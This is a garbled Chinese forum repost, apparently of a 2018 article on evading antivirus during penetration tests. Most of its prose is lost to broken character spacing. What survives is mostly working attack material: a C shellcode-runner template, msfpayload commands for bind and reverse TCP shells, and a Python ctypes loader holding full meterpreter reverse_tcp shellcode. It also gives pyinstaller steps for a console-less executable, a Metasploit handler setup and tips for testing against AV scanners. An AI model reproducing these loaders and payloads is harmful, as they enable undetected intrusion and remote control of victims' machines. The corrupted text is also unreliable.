[7441] 2018-05-16_渗透免杀小技巧

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-17
2018-05-16_渗透免杀小技巧 E l a i n e   F 1 1 T e a m   2 0 1 8 - 0 5 - 1 6 S A N S M a r k   B a g g e t t h t t p s : / / p e n - t e s t i n g . s a n s . o r g / b l o g / 2 0 1 1 / 1 0 / 1 3 / t i p s - f o r - e v a d i n g - a n t i - v i r u s - d u r i n g - p e n - t e s t i n g E l a i n e D E F   C O N         1       2 使 v i r u s t o t a l . c o m 线 /   使   使 V i r u s N o T h a n k s A V 使 h t t p : / / v s c a n . n o v i r u s t h a n k s . o r g / 3 K I S S   -   s h e l l - b o y 访 4   M e t a s p l o i t D L L E X E W i n d o w s   S e r v i c e s d a t a   /   t e m p l a t e s   /   s r c     [ B a s h   s h e l l ]   $   c a t   d a t a / t e m p l a t e s / s r c / p e / e x e / t e m p l a t e . c # i n c l u d e   < s t d i o . h > # d e f i n e   S C S I Z E   4 0 9 6 c h a r   p a y l o a d [ S C S I Z E ]   =   " P A Y L O A D : " ; c h a r   c o m m e n t [ 5 1 2 ]   =   " " ; i n t   m a i n ( i n t   a r g c ,   c h a r   * * a r g v )   {                 ( * ( v o i d   ( * ) ( ) )   p a y l o a d ) ( ) ;                 r e t u r n ( 0 ) ; } [ S C S I Z E ] s h e l l   s h e l l   e x p l o i t - d b h t t p : / / w w w . e x p l o i t - d b . c o m / s h e l l c o d e / s h e l l   使 M e t a s p l o i t m s f p a y l o a d m s f v e n o m C   s h e l l   [ B a s h   s h e l l ]   $   . / m s f p a y l o a d   w i n d o w s / s h e l l _ b i n d _ t c p   C C   s h e l l s h e l l T C P 4 4 4 4 A V     -   s h e l l -   P E E X E C O M . C O M -   s h e l l   -   使 w a i t -   . . . . . .   h t t p : / / w w w . c p r o g r a m m i n g . c o m / t u t o r i a l / x o r . h t m l P y t h o n 使 p y i n s t a l l e r P y t h o n e x e   P y t h o n M e t a s p l o i t C [ P y t h o n ]   f r o m   c t y p e s   i m p o r t   * s h e l l c o d e   =   ' < - a s c i i   s h e l l   c o d e   h e r e   e x :   x 9 0 x 9 0 x 9 0 - > ' m e m o r y w i t h s h e l l   =   c r e a t e _ s t r i n g _ b u f f e r ( s h e l l c o d e ,   l e n ( s h e l l c o d e ) ) s h e l l   =   c a s t ( m e m o r y w i t h s h e l l ,   C F U N C T Y P E ( c _ v o i d _ p ) ) s h e l l ( ) 使 M e t a s p l o i t s h e l l C 使 t r P y t h o n [ B a s h   s h e l l ]   $   . / m s f p a y l o a d   w i n d o w s / s h e l l _ b i n d _ t c p   C     |   t r   - d   ' " '   |   t r   - d   ' n '   M e t a s p l o i t M e t e r p r e t e r [ B a s h   s h e l l ]   $   . / m s f p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 2 7 . 0 . 0 . 1   C   |   t r   - d   ' " '   |   t r   - d   ' n '   |   m o r e [ P y t h o n ]   f r o m   c t y p e s   i m p o r t   * s h e l l c o d e   =   ' x f c x e 8 x 8 9 x 0 0 x 0 0 x 0 0 x 6 0 x 8 9 x e 5 x 3 1 x d 2 x 6 4 x 8 b x 5 2 x 3 0 x 8 b x 5 2 x 0 c x 8 b x 5 2 x 1 4 x 8 b x 7 2 x 2 8 x 0 f x b 7 x 4 a x 2 6 x 3 1 x f f x 3 1 x c 0 x a c x 3 c x 6 1 x 7 c x 0 2 x 2 c x 2 0 x c 1 x c f x 0 d x 0 1 x c 7 x e 2 x f 0 x 5 2 x 5 7 x 8 b x 5 2 x 1 0 x 8 b x 4 2 x 3 c x 0 1 x d 0 x 8 b x 4 0 x 7 8 x 8 5 x c 0 x 7 4 x 4 a x 0 1 x d 0 x 5 0 x 8 b x 4 8 x 1 8 x 8 b x 5 8 x 2 0 x 0 1 x d 3 x e 3 x 3 c x 4 9 x 8 b x 3 4 x 8 b x 0 1 x d 6 x 3 1 x f f x 3 1 x c 0 x a c x c 1 x c f x 0 d x 0 1 x c 7 x 3 8 x e 0 x 7 5 x f 4 x 0 3 x 7 d x f 8 x 3 b x 7 d x 2 4 x 7 5 x e 2 x 5 8 x 8 b x 5 8 x 2 4 x 0 1 x d 3 x 6 6 x 8 b x 0 c x 4 b x 8 b x 5 8 x 1 c x 0 1 x d 3 x 8 b x 0 4 x 8 b x 0 1 x d 0 x 8 9 x 4 4 x 2 4 x 2 4 x 5 b x 5 b x 6 1 x 5 9 x 5 a x 5 1 x f f x e 0 x 5 8 x 5 f x 5 a x 8 b x 1 2 x e b x 8 6 x 5 d x 6 8 x 3 3 x 3 2 x 0 0 x 0 0 x 6 8 x 7 7 x 7 3 x 3 2 x 5 f x 5 4 x 6 8 x 4 c x 7 7 x 2 6 x 0 7 x f f x d 5 x b 8 x 9 0 x 0 1 x 0 0 x 0 0 x 2 9 x c 4 x 5 4 x 5 0 x 6 8 x 2 9 x 8 0 x 6 b x 0 0 x f f x d 5 x 5 0 x 5 0 x 5 0 x 5 0 x 4 0 x 5 0 x 4 0 x 5 0 x 6 8 x e a x 0 f x d f x e 0 x f f x d 5 x 9 7 x 6 a x 0 5 x 6 8 x 7 f x 0 0 x 0 0 x 0 1 x 6 8 x 0 2 x 0 0 x 1 1 x 5 c x 8 9 x e 6 x 6 a x 1 0 x 5 6 x 5 7 x 6 8 x 9 9 x a 5 x 7 4 x 6 1 x f f x d 5 x 8 5 x c 0 x 7 4 x 0 c x f f x 4 e x 0 8 x 7 5 x e c x 6 8 x f 0 x b 5 x a 2 x 5 6 x f f x d 5 x 6 a x 0 0 x 6 a x 0 4 x 5 6 x 5 7 x 6 8 x 0 2 x d 9 x c 8 x 5 f x f f x d 5 x 8 b x 3 6 x 6 a x 4 0 x 6 8 x 0 0 x 1 0 x 0 0 x 0 0 x 5 6 x 6 a x 0 0 x 6 8 x 5 8 x a 4 x 5 3 x e 5 x f f x d 5 x 9 3 x 5 3 x 6 a x 0 0 x 5 6 x 5 3 x 5 7 x 6 8 x 0 2 x d 9 x c 8 x 5 f x f f x d 5 x 0 1 x c 3 x 2 9 x c 6 x 8 5 x f 6 x 7 5 x e c x c 3 ' m e m o r y w i t h s h e l l   =   c r e a t e _ s t r i n g _ b u f f e r ( s h e l l c o d e ,   l e n ( s h e l l c o d e ) ) s h e l l   =   c a s t ( m e m o r y w i t h s h e l l ,   C F U N C T Y P E ( c _ v o i d _ p ) ) s h e l l ( ) p y i n s t a l l e r [ B a s h   s h e l l ]   $   p y t h o n   c o n f i g u r e . p y $   p y t h o n   m a k e s p e c . p y   - - o n e f i l e   - - n o c o n s o l e   s h e l l _ t e m p l a t e . p y $   p y t h o n   b u i l d . p y   s h e l l _ t e m p l a t e s h e l l _ t e m p l a t e . s p e c
使 使 M e t a s p l o i t   [ P l a i n   T e x t ]   m s f   >   u s e   m u l t i / h a n d l e r m s f     e x p l o i t ( h a n d l e r )   >   s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p p a y l o a d   = >   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f     e x p l o i t ( h a n d l e r )   >   s e t   L H O S T   1 2 7 . 0 . 0 . 1   L H O S T   = >   1 2 7 . 0 . 0 . 1 m s f     e x p l o i t ( h a n d l e r )   >   e x p l o i t E l a i n e h t t p : / / n o d i s t r i b u t e . c o m /  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则